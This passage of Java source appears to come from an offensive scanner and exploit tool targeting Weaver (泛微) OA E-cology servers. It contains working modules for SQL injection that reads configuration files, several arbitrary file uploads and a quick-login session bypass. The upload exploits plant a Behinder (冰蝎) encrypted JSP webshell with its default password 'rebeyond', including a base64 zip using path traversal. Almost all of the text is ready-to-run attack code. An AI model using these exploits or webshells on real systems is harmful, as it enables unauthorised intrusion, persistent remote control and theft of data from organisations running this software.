        String url = "/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                Response result = httpRequest.Get("");
                if(result.statusCode==200 && result.responseBody.contains("ecology")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-cology KtreeUploadAction 任意文件上传",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_KtreeUploadAction(Poc_Exp type, String target, Object... args) throws MalformedURLException {

        WriteLog("\n[*]开始检测：  泛微OA E-cology KtreeUploadAction 任意文件上传");

        String url = "/weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image";
        String payload = "----------1638451160\r\n" +
                "Content-Disposition: form-data; name=\"test\"; filename=\"test.jsp\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                "helloword\r\n" +
                "----------1638451160--";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String EXP = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

                if (mypayload!=null){
                    EXP = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
                }
                payload = payload.replace("helloword",EXP);
                HttpRequest ExploitRequest = new HttpRequest(target+url);
                ExploitRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                ExploitRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

                Response exp_result = ExploitRequest.Post(payload);
                if(exp_result.statusCode==200 && exp_result.responseBody.length()>0){
                    WriteExpLog("\n[*] 上传地址地址："+exp_result.responseBody );
                }else {
                    WriteExpLog("\n[*] 利用异常");
                }
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

                Response result = httpRequest.Post(payload);

                if(result.statusCode==200 && result.responseBody.length()>0){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微OA weaver.common.Ctrl 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_weaver_common_Ctrl(Poc_Exp type, String target, Object... args) throws Exception {

        WriteLog("\n[*]开始检测：  泛微OA weaver.common.Ctrl 任意文件上传漏洞");

        String url = "/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp";
        String payload = "----------1638451160\r\n" +
                "Content-Disposition: form-data; name=\"test\"; filename=\"helps.zip\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n";
        String end =  "\r\n----------1638451160--\r\n";
        String shellCode = "UEsDBBQAAAAIACVtIlVQG0RgpAEAAJcCAAAYAAAAaGVscHMvLi4vLi4vLi4vaGVscHMuanNwXZJRb9MwFIX/iuUne0QOlBVpTVNpLUMC9jARlRfEg+Pctt5S29jXpVW1/z47gYL2do9z7pd7jz1/DG7mrUVy3PcmzJKs6Q7RzcryUR6kCNEIZffll+ahfJBboOQAPmhravpOTOhingGd9qBQH0C4ZCF676zHmg6AiLoXV0Wuj0L5k0P7WgYHSlzR8g8MVC+9xPSPBUllCGRN4IhgukBWWd9b2YE/r9l/iih+DtGBZ4pXzy62vVajm2xZe0IgP362/OwBozdkcIoONtrAYGJt8bZoRQ9mi7sEeJ6Xr2cZhgvKa4c94KJBr82WPNUUrqfwfnKzgXba3UymLa0ChByRcBG/yz4Co5EWT7xaabfLo9ZjIbaAn01AaVSy3N41lFdKaKORTQoDv0kDKg38FU5NSoixv9jUdsHyN5TyfLJMOwbGi5HDq9y/ZrjTIX8dl+SXcgyN8XTClOjsJ21kz3JPvvC9Dkosb5u7D9cfQdnBmdLK1TJuNkl6+BUhYOZ9gxElfCruU6CJmriJddmNi2SXfWD5eayswXSdvBoj/pfoqPNjXLwAUEsBAhQAFAAAAAgAJW0iVVAbRGCkAQAAlwIAABgAJAAAAAAAAQAgAAAAAAAAAGhlbHBzLy4uLy4uLy4uL2hlbHBzLmpzcAoAIAAAAAAAAQAYAABf2ZqOvtgBAAAAAAAAAAAAAAAAAAAAAFBLBQYAAAAAAQABAGoAAADaAQAAAAA=";
        switch (type){
            case EXP:
//                String path = null;
//                String mypayload = null;
//                try {
//                    path = (String) args[0];
//                    try {
//                        byte[] bytes = Utils.readFile(path);
//                        mypayload = new String(bytes);
//                    }catch (Exception e){
//                        WriteExpLog("\n [*] 文件读取失败");
//                    }
//                }catch (Exception e){
//
//                }
//                String EXP = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";
//
//                if (mypayload!=null){
//                    EXP = mypayload;
//                }else {
//                    WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
//                }
//                payload = payload.replace("helloword",EXP);
//                HttpRequest ExploitRequest = new HttpRequest(target+url);
//                ExploitRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
//                ExploitRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");
//
//                Response exp_result = ExploitRequest.Post(payload);
//                if(exp_result.statusCode==200 && exp_result.responseBody.length()>0){
//                    WriteExpLog("\n[*] 上传地址地址："+exp_result.responseBody );
//                }else {
//                    WriteExpLog("\n[*] 利用异常");
//                }
                byte[] bytes = Utils.base64Decode(shellCode);
                byte[] body = new byte[payload.getBytes().length+bytes.length+end.getBytes().length];
                System.arraycopy(payload.getBytes(),0,body,0,payload.getBytes().length);
                System.arraycopy(bytes,0,body,payload.getBytes().length,bytes.length);
                System.arraycopy(end.getBytes(),0,body,payload.getBytes().length+bytes.length,end.getBytes().length);

                HttpRequest httpRequest_exp = new HttpRequest(target+url);
                httpRequest_exp.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                httpRequest_exp.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");
                Response result_exp = httpRequest_exp.Post(body);
                if (result_exp.statusCode==200){
                    Response result2 = new HttpRequest(target+"/cloudstore/helps.jsp").Get("");
                    if (result2.statusCode==200||result2.statusCode==500){
                        WriteExpLog("\n[*]上传成功 shell地址："+target+"/cloudstore/helps.jsp");
                    }else {
                        WriteExpLog("\n[*]访问异常 状态码:"+ result2.statusCode);
                        WriteExpLog("\n[*]访问异常 .css 访问200 疑似 shell 被杀");
                    }
                }else {
                    WriteExpLog("\n[*]上传失败");
                }
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                httpRequest.addHeaders("Cookie","Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test");
                Response result = httpRequest.Get("");

                if(result.statusCode==200){
                    WriteLog("\n[*] 访问返回状态码为200 .css可能出现了权限绕过，请手动测试。");
                    WriteLog("\n[*] 访问地址："+target+url );

                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
        }
    }

@VulnerabilityDescriptionMapping(Description = "泛微OA uploadFileClient.jsp 任意文件上传漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_uploadFileClient(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA vul_uploadFileClient 任意文件上传漏洞");

    String url = "/clusterupgrade/uploadFileClient.jsp";
    String randomStr = Utils.getRandomString(4);
    String payload = "----------1638451160\r\n" +
            "Content-Disposition: form-data; name=\"upload\"; filename=\"../../clusterupgrade/"+randomStr+".jsp\"\r\n" +
            "Content-Type: image/jpeg\r\n" +
            "\r\n" +
            "payload\r\n" +
            "----------1638451160--";
    switch (type){
        case EXP:
            String path = null;
            String mypayload = null;
            try {
                path = (String) args[0];
                try {
                    byte[] bytes = Utils.readFile(path);
                    mypayload = new String(bytes);
                }catch (Exception e){
                    WriteExpLog("\n [*] 文件读取失败");
                }
            }catch (Exception e){

            }
            String EXP = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n";

            if (mypayload!=null){
                EXP = mypayload;
            }else {
                WriteExpLog("\n [*] 默认shell 为冰蝎shell 密码 rebeyond");
            }
            payload = payload.replace("payload",EXP);
            HttpRequest ExploitRequest = new HttpRequest(target+url);
            ExploitRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

            Response exp_result = ExploitRequest.Post(payload);
            if(exp_result.statusCode==200 && exp_result.responseBody.length()>0){
                WriteExpLog("\n[*] 上传地址地址："+target+"/clusterupgrade/"+randomStr+".jsp" );
            }else {
                WriteExpLog("\n[*] 利用异常 请手动访问"+target+"/clusterupgrade/"+randomStr+".jsp");
            }
            break;
        case POC:
            payload = payload.replace("payload","<%out.print(\"test\");%>");
            HttpRequest httpRequest = new HttpRequest(target+url);
            httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----1638451160");

            httpRequest.Post(payload);

            Response result = new HttpRequest(target+"/clusterupgrade/"+randomStr+".jsp").Get("");


            if(result.statusCode==200 && result.responseBody.length()>0){

                WriteSuccessLog("\n[*] 存在漏洞");
                WriteSuccessLog("\n[*] 访问地址："+target+"/clusterupgrade/"+randomStr+".jsp" );

            }else {
                WriteLog("\n[*] 不存在漏洞");
            }
}

}



    @VulnerabilityDescriptionMapping(Description = "泛微OA VerifyQuickLogin.jsp 任意用户登录漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_VerifyQuickLogin(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("泛微OA VerifyQuickLogin.jsp 任意用户登录漏洞");
        String url = "/mobile/plugin/VerifyQuickLogin.jsp";
        String data = "identifier=1&language=1&ipaddress=1.1.1.1";
        switch (type){
            case EXP:

                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                Response result = httpRequest.Post(data);
                if (result.statusCode==200 && result.responseBody.contains("sessionkey")){
                    WriteSuccessLog("Session:"+result.responseBody);
                }else {
                    WriteFailLog("失败，状态码："+result.statusCode);
                }
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA getSqlData sql注入漏洞",SupportVulType = com.achuna33.SupportType.SupportVul.UploadFile)
    public void vul_getSqlData(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("泛微OA getSqlData sql注入漏洞");
        String randomStr = Utils.getRandomString(5);
        String url = "/Api/portal/elementEcodeAddon/getSqlData?sql=select%20"+randomStr;
        switch (type){
            case EXP:

                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                Response result = httpRequest.Get("");
                if (result.responseBody.contains(randomStr)){
                    WriteSuccessLog("存在漏洞 POC：" +target+url);
                }else {
                    WriteFailLog("失败，状态码："+result.statusCode);
                }
        }
    }

    public static void main(String[] args) throws Exception {
        FileInputStream inputStream = new FileInputStream("C:\\Users\\Chun\\Desktop\\新建文件夹\\helps.zip");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);
        System.out.println(Utils.base64Encode(bytes));
    }
}
